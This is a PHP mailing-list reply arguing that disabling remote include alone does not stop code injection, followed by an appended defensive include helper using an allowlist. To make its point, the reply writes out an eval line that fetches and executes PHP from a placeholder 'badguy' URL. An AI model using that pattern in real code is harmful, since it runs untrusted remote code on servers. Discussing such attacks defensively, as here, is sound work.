Re: allow_url_fopen ini directive not enough

Kelvin Jones wrote:
> I would like to see a new directive to go alongside "allow_url_fopen" to
> allow people to turn on or off the ability to include/require a remote
> file.
>
> The ability to include and execute a file as php from a remote host
> leaves many applications open to cross-site-scripting attacks.
> This would be easily avoidable if we had a directive
> (allow_url_include?) that by default removed this capability.

Seems kinda pointless to me...

If a Programmer is dumb enough to include/require untrusted source code,
they can just as easily do:

eval(implode('', file('http://example.com/badguy.php')));

after you've turned "OFF" allow_url_include but left allow_url_fopen "ON"

If an attacker is managing to alter your PHP source to pull in his remote
PHP, then the remote PHP feature isn't really all that crucial -- It's
more convenient for them to suck it in from their remote server, perhaps,
or maybe they are worming through a database field that is too short to
hold all their source, so they shove in an "include" -- Still, *any* PHP
code they can execute will eventually give them control anyway.

If an attacker gains access to remote "trusted" source and replaces it,
then your decision to trust that source was faulty -- Which is neither
helped nor hindered by the remote include function, really.  If you needed
that source, you can find a way to get it and have PHP evaluate it, unless
you disable all remote file access completely... Even then, a cron job to
snag it with wget, and an include, and you're back at Square One.

I guess I'm saying that only education and diligence by programmers is
going to avoid this attack.  Turning off only the remote include, but not
remote fopen, won't stop anybody with half a clue for more than 30
seconds.

This is just my take on it, and there could easily be subtle issues or
known exploits you are trying to squash of which I know nothing.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
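Whatever the ini directives end up doing (PHP did later add an `allow_url_include` directive), the thread's real point is that the include path must never be attacker-controlled. The helper below is an added example, not code from the thread: it resolves a request parameter against a fixed allowlist and confines the result to an assumed `pages/` directory, so remote URLs, stream wrappers and `../` traversal are rejected regardless of how `allow_url_fopen` is set.

```php
<?php
// Added example (not from the thread): a defensive include helper that refuses
// remote and traversal paths regardless of allow_url_fopen / allow_url_include.
// Assumed layout: includable pages live in one directory and are selected by a
// short name taken from the request.

declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';                  // assumed location of pages
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // assumed allowlist

/**
 * Resolve a user-supplied page name to a file inside PAGE_DIR, or return null.
 * Two layers: an exact-name allowlist, then realpath() to confine the result.
 */
function resolve_page(string $name): ?string
{
    // 1. Exact-name allowlist: "http://...", "php://input", "../x" all fail here.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Re-check that the resolved filesystem path is still inside PAGE_DIR
    //    (guards against symlinks or a careless future allowlist entry).
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = (string) ($_GET['page'] ?? 'home');
$file = resolve_page($requested);
if ($file === null) {
    http_response_code(404);
    exit('unknown page');
}
require $file;
```

In php.ini, setting `allow_url_include = Off` (and `allow_url_fopen = Off` where remote reads are not needed) is still worth doing as defence in depth, but as the reply notes it does not substitute for never passing untrusted input to include/require.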

